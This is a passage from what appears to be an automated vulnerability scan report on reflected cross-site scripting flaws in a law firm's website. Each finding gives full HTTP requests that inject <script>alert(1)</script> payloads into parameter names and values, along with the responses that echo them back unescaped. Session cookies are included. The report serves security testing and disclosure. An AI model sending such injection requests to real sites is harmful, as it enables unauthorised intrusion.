Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:55 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46467


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/professionals/uniEntity.aspx?d7874<script>alert(1)</script>67ed776ea04=1&xpST=ProfessionalDetailPDF&professional=4984&pdf=yes</div>
...[SNIP]...

5.131. http://www.hunton.com/dallas-united-states-of-america/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /dallas-united-states-of-america/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 85671<script>alert(1)</script>da71c94b3eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dallas-united-states-of-america/?85671<script>alert(1)</script>da71c94b3eb=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; DefaultCulture=en-US; Mode=1; EventingStatus=1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; NavId=1846; PortletId=5983402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:33 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1853; path=/
Set-Cookie: PortletId=5990402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42545


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/locations/uniEntity.aspx?85671<script>alert(1)</script>da71c94b3eb=1&xpST=OfficeDetail&office=6&pdf=yes</div>
...[SNIP]...

5.132. http://www.hunton.com/disclaimer/uniGC.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /disclaimer/uniGC.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c62ea<script>alert(1)</script>b61219ade15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /disclaimer/uniGC.aspx?xpST=Disclaimer&c62ea<script>alert(1)</script>b61219ade15=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:13:00 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1855; path=/
Set-Cookie: PortletId=5992402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 50878


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/disclaimer/uniGC.aspx?xpST=Disclaimer&c62ea<script>alert(1)</script>b61219ade15=1&pdf=yes</div>
...[SNIP]...

5.133. http://www.hunton.com/news/uniGC.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /news/uniGC.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a456e<script>alert(1)</script>c6ecfef4a6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/uniGC.aspx?xpST=PENSearch&a456e<script>alert(1)</script>c6ecfef4a6c=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:02 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1849; path=/
Set-Cookie: PortletId=5986402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=3274fdb8-62f1-4551-b6d0-d1d666f3e788; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 170885


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch&a456e<script>alert(1)</script>c6ecfef4a6c=1&pdf=yes</div>
...[SNIP]...

5.134. http://www.hunton.com/news/uniGC.aspx [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /news/uniGC.aspx

Issue detail

The value of the nsextt request parameter is copied into the HTML document as plain text between tags. The payload d2516<script>alert(1)</script>da9dcb68d27 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/uniGC.aspx?xpST=PENSearch&nsextt=%27%3E%3Cscript%3Enetsparker(9)%3C/script%3Ed2516<script>alert(1)</script>da9dcb68d27 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:44:09 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1849; path=/
Set-Cookie: PortletId=5986402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
</script>d2516<script>alert(1)</script>da9dcb68d27&pdf=yes</div>
...[SNIP]...

5.135. http://www.hunton.com/private_wealth_advisors/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /private_wealth_advisors/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7cf20<script>alert(1)</script>3a817fcf669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /private_wealth_advisors/?7cf20<script>alert(1)</script>3a817fcf669=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/services/uniGC.aspx?xpST=ServiceList
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:40:34 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1847; path=/
Set-Cookie: PortletId=5984402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45737


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/services/uniEntity.aspx?7cf20<script>alert(1)</script>3a817fcf669=1&xpST=ServiceDetailPDF&service=66&pdf=yes</div>
...[SNIP]...

5.136. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The value of the LastName request parameter is copied into the HTML document as plain text between tags. The payload f4618<script>alert(1)</script>6286371e1b0 was submitted in the LastName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=Kf4618<script>alert(1)</script>6286371e1b0 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:58 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/